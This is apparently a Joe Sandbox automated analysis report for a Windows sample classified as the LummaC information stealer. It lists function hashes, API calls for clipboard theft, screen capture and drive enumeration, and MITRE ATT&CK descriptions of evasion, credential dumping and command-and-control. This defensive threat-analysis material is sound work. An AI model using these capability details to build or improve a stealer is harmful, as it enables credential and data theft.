Instruction Fuzzy Hash: B0F0F0F4A08616DFDA149B18DC4373AB7A6FFC2310F284528EB8197170F331AC12CA4A

Function 00418672 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0bff55706ff93967b4313bb2a1d7a7ee9ee426091711acca18b712e24a09905
Instruction ID: c14077b8a130247762470a12415ef9365636b0c970e2bf5ce29861a99db5fcbf
Opcode Fuzzy Hash: d0bff55706ff93967b4313bb2a1d7a7ee9ee426091711acca18b712e24a09905
Instruction Fuzzy Hash: B2F08238502120EEC7588F189EC157D73A2F747311729147EC406A31A0DF34ACD2C90E

Function 008258FA Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fba0dd296d97388ae8806046d0d018cb5991b0a5fc03ca011737e50afd9cac09
Instruction ID: e4ca40eebfb4c24a28d3dbd460e1540e6bc5aaf031455e65ce92d0ce4e1abea4
Opcode Fuzzy Hash: fba0dd296d97388ae8806046d0d018cb5991b0a5fc03ca011737e50afd9cac09
Instruction Fuzzy Hash: 66F0E234649621EFD718CB18F891539B763FB82321F988238E098970A0D330BCD18A48

Function 00836BA7 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beb5adae6fff6175e383ddf1efeefbc8f00a994d28ce3fd0efda4cde5bc363b2
Instruction ID: 41076054f84e58da6e42b7c10de728fdfdd829581d5336642d95ea16159fb216
Opcode Fuzzy Hash: beb5adae6fff6175e383ddf1efeefbc8f00a994d28ce3fd0efda4cde5bc363b2
Instruction Fuzzy Hash: 9DF08CB4A05015EBD7288B289885A7DF372FB86325FA89128D515A32A0D330FC119A88

Function 0081D12E Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
Instruction ID: 472745444e574887e9e837af7f1e368048014e80c244583d35fba0f62c0388ff
Opcode Fuzzy Hash: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
Instruction Fuzzy Hash: 78E059346586C0CBC218EB19DC628B9736AFF81308710542D905787E52CE74A886CB0B

Function 0040CEC7 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
Instruction ID: 7afc85315bce952cb7d9511845f2cfe5cc4fdaba4f93361a027a170bce18a72b
Opcode Fuzzy Hash: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
Instruction Fuzzy Hash: B2E07D3461DA008BE218EF12D95543B73B2AF82308711587E91D3276D2CE78A806DB5D

Function 0042B652 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf2067ab6f32b58c45c9008d31a8987c58cfc8b8a777689b5c00e406fa9fe567
Instruction ID: 85f90f05b7cd9740f0dd11be4e47d539d37879f59d8f753959adedc7e492877d
Opcode Fuzzy Hash: bf2067ab6f32b58c45c9008d31a8987c58cfc8b8a777689b5c00e406fa9fe567
Instruction Fuzzy Hash: 72E08678B18231DBD6148F05F99163AB3A1EFD7305F98543F904657620E334AC02C68F

Function 0082F507 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: 476aa3d42252d21805f67abb09d75edeb8f0bd772e2a29650c77653f021dc1cb
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: 9FD097205083B00E47088D3820A083BFBF4F943212B0810BFE0C1E3006D220EC01C258

Function 0041F2A0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: 3e00189c545ef2cffbc0a4c45a62ec63a19577d5de140b8962752aa3758dc2ad
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: EDD0A7755487A10E9759CD3804A04B7FBE8E947612B1814EFE4D5E7205D239DC46469C

Function 0081D59B Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
Instruction ID: 7778d037b0d1087bc874bf23ff28051bf408a32cf148b9c06970d49953aa9a78
Opcode Fuzzy Hash: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
Instruction Fuzzy Hash: FCC04C69A6C5008A9248CB15AC50571627A9F9B254B15E029801A93255E2249497894D

Function 0040D334 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
Instruction ID: 8c6602917fdb956e33e5ed0c062c44bb8739f147fa9184780212f41d8b26cb24
Opcode Fuzzy Hash: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
Instruction Fuzzy Hash: 50C04C69E6C4008B924CCB15AC5153266769B8B254715E03A841663255E234945B950D

Function 008521EA Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
Instruction ID: d46756a0e1fb04911aea311e00f3b6d6bbb29cfd6f8012ad29779e734c60ec08
Opcode Fuzzy Hash: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
Instruction Fuzzy Hash: D7B002749493418BD380CF18D545726F6F0B747615F142919A054F3151D374D9488A5E

Function 00851C3E Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
Instruction ID: c018d795f0dc3322a67de82126959776e6cc80093cc23c5047751edba26d1c35
Opcode Fuzzy Hash: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
Instruction Fuzzy Hash: BC900224D49100CA81408F45A480570E278630B10DF1534109008F3011C210D404450C

Function 00846A57 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 109clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00846A6B
GetClipboardData.USER32 ref: 00846A86
GlobalLock.KERNEL32 ref: 00846A9F
GetWindowLongW.USER32 ref: 00846B04
GlobalUnlock.KERNEL32 ref: 00846BC0
CloseClipboard.USER32 ref: 00846BC9

Strings

@, xrefs: 00846B51
t, xrefs: 00846B3D
C, xrefs: 00846B1F
{, xrefs: 00846B24
N, xrefs: 00846B29
E, xrefs: 00846B1A
}, xrefs: 00846B38
B, xrefs: 00846B2E
O, xrefs: 00846B33
K, xrefs: 00846B4C
F, xrefs: 00846B47

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: @$B$C$E$F$K$N$O$t${$}
API String ID: 2832541153-984153585
Opcode ID: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
Instruction ID: ca40a087cb9146049d42b3254cd0c027ca522d92efe83fc580b50db2b743f721
Opcode Fuzzy Hash: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
Instruction Fuzzy Hash: FC415D7050C7858ED301EF78948935FBFE0EB92318F090D6DE4D9C6292D679C58887A7

Function 008355CF Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 106COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 0083572D

Strings

?P:V, xrefs: 0083561A
1D6Z, xrefs: 00835602
.T'j, xrefs: 00835622
C`<f, xrefs: 0083563A
:@&F, xrefs: 008355FA
,X*^, xrefs: 0083560A
%\)R, xrefs: 00835612

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID: DrivesLogical
String ID: %\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f
API String ID: 999431828-351939610
Opcode ID: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
Instruction ID: a73c7aef8157077d829ed0a012d3e5d0d46a01dbe82342518bce0f414adedad4
Opcode Fuzzy Hash: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
Instruction Fuzzy Hash: D231EBB41093448FC710CF29C95226BBBF2FFC1354F04981CE5968B720EB79AA46CB82

Function 00846BE7 Relevance: 12.1, APIs: 8, Instructions: 67windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00846BF0
GetCurrentObject.GDI32(00000000,00000007), ref: 00846C11
GetObjectW.GDI32(00000000,00000018,?), ref: 00846C21
DeleteObject.GDI32(00000000), ref: 00846C28
CreateCompatibleDC.GDI32(00000000), ref: 00846C37
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00846C42
SelectObject.GDI32(00000000,00000000), ref: 00846C4E
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00846C71

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelect
String ID:
API String ID: 2843486406-0
Opcode ID: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
Instruction ID: 179a8726ead3fb2044b4a10a9587a3d07a7e6fb5163da62c11996033b662de1d
Opcode Fuzzy Hash: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
Instruction Fuzzy Hash: 9D214FB9504310EFE3509F649C49B2B7BF8FB8BB11F014929FA59E2290D77498048B67

Function 00835367 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00835411

Strings

+$e, xrefs: 008353CC, 008353E1
+$e, xrefs: 00835459
XY, xrefs: 008353AD
E#G, xrefs: 008353A1

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: +$e$+$e$XY$E#G
API String ID: 237503144-1023387988
Opcode ID: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
Instruction ID: 663b937aed7620ba703d348537370300a004f04e766255923939dcef8c823a84
Opcode Fuzzy Hash: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
Instruction Fuzzy Hash: 6A21E57424C344AFD3148F65D98175FBBE0EBC6714F25C92CE5A857282D675C80A8B86

Function 00835A47 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 117COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00835B5B

Strings

`J/H, xrefs: 00835A8D
B"@, xrefs: 00835A7F
rp, xrefs: 00835A9B

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: B"@$`J/H$rp
API String ID: 237503144-3817236508
Opcode ID: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
Instruction ID: f0165f670e574bd123ececc3ff11c1dc4664e51d0de137ae4c9f0b8bbe4af8ab
Opcode Fuzzy Hash: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
Instruction Fuzzy Hash: 9031CDB0E443589FDB10CFA9D8827DEBBB2EF45700F10012CE441BB295D6B55906CFA9

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Q7QR4k52HL.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Q7QR4k52HL.exe_6efd3e7de76eabc1b11f8121be247ddac26fafd0_fed671df_736b4876-c6ee-4a4a-a2cf-0f6fb449af83\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFA25.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB9D.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFBCD.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
Q7QR4k52HL.exe

Function 0043B870 Relevance: 37.6, APIs: 11, Strings: 10, Instructions: 880
memorycomCOMMON

Function 00408880 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 180
threadCOMMON

Function 0040B2B0 Relevance: 9.3, Strings: 7, Instructions: 518
COMMON

Function 00421E70 Relevance: 4.2, Strings: 3, Instructions: 435
COMMON

Function 005807A6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 0040AA32 Relevance: 2.6, Strings: 2, Instructions: 64
COMMON

Function 0081003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 0040E3D3 Relevance: 3.1, APIs: 2, Instructions: 120
COMMON

Function 00810E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 00440260 Relevance: 1.5, APIs: 1, Instructions: 30
memoryCOMMON

Function 0040DF92 Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre